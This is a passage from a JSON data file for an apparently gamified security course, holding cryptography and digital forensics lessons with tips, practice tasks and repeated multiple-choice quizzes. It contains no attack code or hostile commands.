malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-hmac2","cat":"Cryptography","title":"HMAC Purpose and Construction","diff":2,"xp":150,"intro":"Hash + secret key for message authentication.","sections":[{"type":"text","content":"Hash + secret key for message authentication."},{"type":"code","lang":"bash","content":"HMAC(key, message) proves both integrity and authenticity \u2014 resistant to length extension"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"HMAC differs from plain hashing by...","opts":["Being faster","Including a secret key","Being reversible","Using less memory"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-pgp","cat":"Cryptography","title":"PGP/GPG Usage","diff":1,"xp":75,"intro":"Encrypt and sign files with public key cryptography.","sections":[{"type":"text","content":"Encrypt and sign files with public key cryptography."},{"type":"code","lang":"bash","content":"Generate keypair, share public key, encrypt/decrypt/sign files"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"PGP encryption uses...","opts":["Symmetric only","Hybrid (asymmetric for key exchange + symmetric for data)","Hashing only","No encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-rainbow","cat":"Cryptography","title":"Rainbow Table Attacks","diff":1,"xp":75,"intro":"Pre-computed hash tables for instant password lookup.","sections":[{"type":"text","content":"Pre-computed hash tables for instant password lookup."},{"type":"code","lang":"bash","content":"Trade storage for computation \u2014 salting defeats them completely"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Rainbow tables are defeated by...","opts":["Longer passwords","Salting (different salt per password)","Faster hashing","Shorter hashes"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-encoding","cat":"Cryptography","title":"Encoding vs Encryption vs Hashing","diff":1,"xp":50,"intro":"Three different transforms that people confuse.","sections":[{"type":"text","content":"Three different transforms that people confuse."},{"type":"code","lang":"bash","content":"Encoding: compatibility (Base64). Encryption: confidentiality (AES). Hashing: integrity (SHA256)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed, no key needed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"fo-fo-disk-image","cat":"Forensics & IR","title":"Forensic Disk Imaging","diff":1,"xp":50,"intro":"Create bit-for-bit copies for analysis.","sections":[{"type":"text","content":"Create bit-for-bit copies for analysis."},{"type":"code","lang":"bash","content":"dd, dc3dd, FTK Imager \u2014 always hash before and after"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why hash the disk?","opts":["Compress it","Prove the copy is identical (integrity)","Encrypt it","Find malware"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-write-block","cat":"Forensics & IR","title":"Write Blockers","diff":1,"xp":50,"intro":"Prevent accidental evidence modification.","sections":[{"type":"text","content":"Prevent accidental evidence modification."},{"type":"code","lang":"bash","content":"Hardware or software write blockers ensure read-only access"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Write blockers prevent...","opts":["Reading","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-strings-analysis","cat":"Forensics & IR","title":"Strings Analysis","diff":1,"xp":75,"intro":"Extract readable text from binary files.","sections":[{"type":"text","content":"Extract readable text from binary files."},{"type":"code","lang":"bash","content":"strings command finds ASCII/Unicode text \u2014 reveals URLs, credentials, commands"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Strings analysis finds...","opts":["Encryption keys","Readable text like URLs, credentials, and commands","Binary data","Compressed files"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-hash-verification","cat":"Forensics & IR","title":"Evidence Hash Verification","diff":1,"xp":50,"intro":"Verify evidence integrity with cryptographic hashes.","sections":[{"type":"text","content":"Verify evidence integrity with cryptographic hashes."},{"type":"code","lang":"bash","content":"SHA-256 hash before and after every operation \u2014 proves nothing was changed"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Evidence hashes prove...","opts":["The suspect is guilty","The evidence wasn't tampered with","The tool works","The case is closed"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process 